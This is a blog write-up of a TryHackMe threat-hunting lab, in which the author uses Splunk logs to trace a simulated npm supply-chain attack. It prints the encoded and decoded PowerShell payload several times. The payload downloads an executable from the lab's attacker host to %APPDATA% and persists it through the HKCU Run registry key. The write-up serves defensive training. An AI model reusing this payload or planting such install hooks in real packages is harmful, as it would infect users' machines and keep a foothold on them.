Threat Hunting Simulator: Health Hazard - TryHackMe writeup

AnirudhAnirudh
9 min read

This writeup covers the new Threat Hunting simulator room ‘Health Hazard’ rated Easy from Tryhackme.

At a high level, the challenge involved going through a splunk log to trace out the attack path, we have all the information needed to complete the challenge in the simulator dashboard itself and this room is a great practice for threat hunting

I’ll walk through my thought process, mistakes, and how I eventually solved it.

Start the simulator and take a look around the dashboard, Make sure you make note of every information here, including the executive summary, threat hunting mission and IOCs(indicator of compromise).

What does each section mean ?

The SIEM tab contains the splunk enterprise version with logs we need to go through.

The My Computer section gives us a remote web based desktop connection to a desktop environment.

The Documentation section contains a overally summary of the company data such as all the user account information, and asset information, including network, subnets and endpoints.

The Timeline is where we map out each and every step we uncover in the attack chain from Initial compromise to privilege escalation and lateral movement. When we submit an attack chain we discovered, we will get to know if its right or not, allowing us to move step by step in this lab.

The Threat Report tab is where we submit a final report proving or disproving the hypothesis, and also submitting a high level attack chain with all the steps.

Understanding some important information

Lets layout some important information we have read so far from the dashboard.

Attacker behaviour:

TryDetectThis Intelligence has identified a coordinated supply chain attack campaign targeting open-source ecosystems, specifically, npm and Python package repositories. The campaign appears to be orchestrated by a threat actor leveraging long-term infiltration of neglected or low-profile projects to weaponize legitimate packages.

The attacker’s strategy involves contributing to moderately used but under-maintained libraries, gaining contributor or maintainer status through helpful commits. Once trusted, they publish malicious updates, embedding post-installation payloads or obfuscated backdoors within version releases that appear minor or maintenance-related.

Indicators of compromise (IoC):

All of these IOCs are important patterns to remember.

Host-Based IOCs

TypeValue
NPM Packagehealthchk-lib@1.0.1
Registry PathHKCU\Software\Microsoft\Windows\CurrentVersion\Run
Registry Value NameWindows Update Monitor
Registry Value Datapowershell.exe -NoP -W Hidden -EncodedCommand <base64>
Downloaded File Path%APPDATA%\SystemHealthUpdater.exe
PowerShell CommandInvoke-WebRequest -Uri ... -OutFile ...
Process Executionpowershell.exe -NoP -W Hidden -EncodedCommand ...
Script ArtifactFound in package.json under "postinstall"

Network-Based IOCs

TypeValue
Download URLhttp://global-update.wlndows.thm/SystemHealthUpdater.exe
Hostname Contactedglobal-update.wlndows.thm
ProtocolHTTP (unencrypted)
Port80
Traffic BehaviorOutbound file download to %APPDATA% via PowerShell

Mapping the attack #1 — Initial access

Analysis in Splunk

Open the splunk enterprise instance provided, lets do some log analysis. we are provided with many logs across the network, and it is not feasible to go through each and every one of them, so lets do some filtering.

From the attacker behaviour, you may understand that the attack is based on npm and python libraries.

so use a simple OR FILTER in splunk to list only those logs containing npm and python keywords.

We have reduced the events to 5, now go through every one of them and understand what triggered the alert, and what is happening in the background, if they seem like a IoC, it probably is part of the attack.

From the first event from down, we can see a command to install a node package called healthchk-lib@1.0.1, remember this exact package and version was part of the IoC to look out for.

Moving up, we come across this really interesting command execution alert, running a powershell command that is base64 encoded, let’s decode this!

I used cyberchef to decode the base64:

And we have this powershell script:

$dest = "$env:APPDATA\SystemHealthUpdater.exe"
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"

# Download file
Invoke-WebRequest -Uri $url -OutFile $dest

# Base64 encode the command
$encoded = [Convert]::ToBase64String(
    [Text.Encoding]::Unicode.GetBytes("Start-Process '$dest'")
)

# Build persistence command
$runCmd = 'powershell.exe -NoP -W Hidden -EncodedCommand ' + $encoded

# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
    -Name 'Windows Update Monitor' -Value $runCmd

The attacker was kind enough to not obfuscate the script and also added comments for us!

The script does this:

  • Download a executable (.exe) file from a external url and save it to APPDATA folder.

  • Base64 encode the command start-process <appdata-path>

  • run the start-process command using powershell — basically run the exe file.

  • Setup windows registry to run the command for persistence.

We have found the way in which the attacker made a Initial access to our network, so lets document the steps in Timeline. Go to Timeline section, and click on Stage 1 of 3 and add the following information.

Adversary step description:

The user `tom@pawpress.me` had installed a compromised NPM package named - `healthchk-lib@1.0.1`. The library post install, ran an encoded command in powershell that further installed a malicious executable from an external url. The executable was run, and set as a registry for persistence.

Tactic: Initial Access

Technique: Supply chain compromise

User: tom@pawpress.me

Timestamp: (Find it from the event in splunk)

List of IOCs: (Just list the stuff you noticed that is part of the IOC list)

healthchk-lib@1.0.1
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
powershell.exe -NoP -W Hidden -EncodedCommand
Found in package.json under "postinstall"
http://global-update.wlndows.thm/SystemHealthUpdater.exe
global-update.wlndows.thm
Outbound file download to %APPDATA% via PowerShell

Submit it, and if its right, you will get to the next step.

Mapping the attack #2 — Execution

We have already gone through this step as part of the initial access, the npm package ran a powershell script that downloaded an executable from an external host. This is part of the execution phrase in MITRE ATT&CK mappings.

Now all you gotta do for this step is to submit the attack chain stage 2 of 3.

Adversary step description:

After installing the npm package, the postinstall.ps1 script was executed which ran a hidden powershell command (which was encoded). this downloaded an .exe from a external host, and saved it to %APPDATA% using invoke-webrequest

Tactic: Execution

Technique: Command and scripting interpreter

User: tom@pawpress.me

Timestamp: (Same as previous)

List of IOCs: (Just list the stuff you noticed that is part of the IOC list)

Powershell command (encoded):

C:\Windows\system32\cmd.exe /d /s /c powershell.exe -NoP -W Hidden -EncodedCommand JABkAGUAcwB0ACAAPQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABTAHkAcwB0AGUAbQBIAGUAYQBsAHQAaABVAHAAZABhAHQAZQByAC4AZQB4AGUAIgANAAoAJAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AZwBsAG8AYgBhAGwALQB1AHAAZABhAHQAZQAuAHcAbABuAGQAbwB3AHMALgB0AGgAbQAvAFMAeQBzAHQAZQBtAEgAZQBhAGwAdABoAFUAcABkAGEAdABlAHIALgBlAHgAZQAiAA0ACgANAAoAIwAgAEQAbwB3AG4AbABvAGEAZAAgAGYAaQBsAGUADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABkAGUAcwB0AA0ACgANAAoAIwAgAEIAYQBzAGUANgA0ACAAZQBuAGMAbwBkAGUAIAB0AGgAZQAgAGMAbwBtAG0AYQBuAGQADQAKACQAZQBuAGMAbwBkAGUAZAAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgADQAKACAAIAAgACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAiAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnACQAZABlAHMAdAAnACIAKQANAAoAKQANAAoADQAKACMAIABCAHUAaQBsAGQAIABwAGUAcgBzAGkAcwB0AGUAbgBjAGUAIABjAG8AbQBtAGEAbgBkAA0ACgAkAHIAdQBuAEMAbQBkACAAPQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBOAG8AUAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAnACAAKwAgACQAZQBuAGMAbwBkAGUAZAANAAoADQAKACMAIABBAGQAZAAgAHQAbwAgAHIAZQBnAGkAcwB0AHIAeQAgAGYAbwByACAAcABlAHIAcwBpAHMAdABlAG4AYwBlAA0ACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAAYAANAAoAIAAgACAAIAAtAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMAIABVAHAAZABhAHQAZQAgAE0AbwBuAGkAdABvAHIAJwAgAC0AVgBhAGwAdQBlACAAJAByAHUAbgBDAG0AZAA= 


decoded powershell command:
$dest = "$env:APPDATA\SystemHealthUpdater.exe"
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"

# Download file
Invoke-WebRequest -Uri $url -OutFile $dest

# Base64 encode the command
$encoded = [Convert]::ToBase64String(
    [Text.Encoding]::Unicode.GetBytes("Start-Process '$dest'")
)

# Build persistence command
$runCmd = 'powershell.exe -NoP -W Hidden -EncodedCommand ' + $encoded

# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
    -Name 'Windows Update Monitor' -Value $runCmd

Submit and let’s move on to the last stage.

Mapping the attack #3 — Persistence

From the Powershell script, the last stage was to do persistence. According to MITRE:

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

Here the attacker embedded the code to add a value to the registry:

# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
    -Name 'Windows Update Monitor' -Value $runCmd

The HKCU:\Software\Microsoft\Windows\CurrentVersion\Run Registry is executed everytime the User Login, so this is an persistence mechanism that lets the attacker persist.

Adversary step description:

The attacker creates persistence by modifying the user registry HKCU:\Software\Microsoft\Windows\CurrentVersion\Run to have the value powershell.exe -NoP -W Hidden -EncodedCommand <base64 encoded command> . the base64 encoded command is the command to run the executable systemhealthupdater.exe which is originally downloaded from the external host in execution phrase.

Tactic: Persistence

Technique: Boot or Logon autostart execution

User: tom@pawpress.me

Timestamp: (This should be the time after the install and run of powershell command, so the next event after that)

List of IOCs: (Just list the stuff you noticed that is part of the IOC list)

Command run to update the registry:
```
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
    -Name 'Windows Update Monitor' -Value $runCmd```

decoded powershell command:
```
$dest = "$env:APPDATA\SystemHealthUpdater.exe"
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"

# Download file
Invoke-WebRequest -Uri $url -OutFile $dest

# Base64 encode the command
$encoded = [Convert]::ToBase64String(
    [Text.Encoding]::Unicode.GetBytes("Start-Process '$dest'")
)

# Build persistence command
$runCmd = 'powershell.exe -NoP -W Hidden -EncodedCommand ' + $encoded

# Add to registry for persistence
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' `
    -Name 'Windows Update Monitor' -Value $runCmd```

We have unfolded all the stages of the attack, now submit the attack chain.

Seems like it is proven afterall this evidences we have found, review the ai generated report and click on submit findings.

AI Generated Report

Threat Case Report: Supply Chain Compromise via Malicious NPM Package

Executive Summary

This report outlines a coordinated cyber attack initiated through a compromised NPM package, culminating in persistent system compromise. The attack chain successfully employed three key stages: Initial Access, Execution, and Persistence.

Stage 1: Initial Access - Matching IoC

  • Description: An NPM package named healthchk-lib@1.0.1 was installed by user tom@pawpress.me on the asset paw-tom. The package executed a post-install PowerShell command to download and run a malicious executable from http://global-update.wlndows.thm/SystemHealthUpdater.exe, establishing persistence.

  • Tactic & Technique: Initial Access (TA0001), Supply Chain Compromise (T1195)

  • Indicators of Compromise (IoC): healthchk-lib@1.0.1, PowerShell encoded command, registry entry for persistence

Stage 2: Execution

  • Description: The NPM package’s postinstall.ps1 script executed a hidden, encoded PowerShell command. This command utilized Invoke-WebRequest to download an executable to %APPDATA%, facilitating malicious activity.

  • Tactic & Technique: Execution (TA0002), Command and Scripting Interpreter (T1059)

  • IoC: Encoded PowerShell command and specific URL targeting the asset's %APPDATA% directory

Stage 3: Persistence

  • Description: Persistence was achieved through registry modification, setting the executable to run at system startup. The registry path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run was updated to execute the PowerShell command silently.

  • Tactic & Technique: Persistence (TA0003), Boot or Logon Autostart Execution (T1547)

  • IoC: Registry path modification and associated PowerShell command

Impact and Findings

The attack illustrates a sophisticated supply chain compromise using a malicious NPM package to deliver a payload, which maintains persistence through registry modification. This compromise potentially exposes the affected system to further attacks and unauthorized access, necessitating immediate remedial actions to mitigate further risks. Comprehensive investigation and system audits are recommended to prevent recurrence.

That summarises our findings quiet well, go ahead and submit the report if it does for you.

The lab is done, although we did not get the full points, we did get majority of the things right. I recommend you go through the analysis and find what were wrong to learn better.

5
Subscribe to my newsletter

Read articles from Anirudh directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Anirudh
Anirudh

I write about Hacking, CTFs and other interesting security and programming stuff.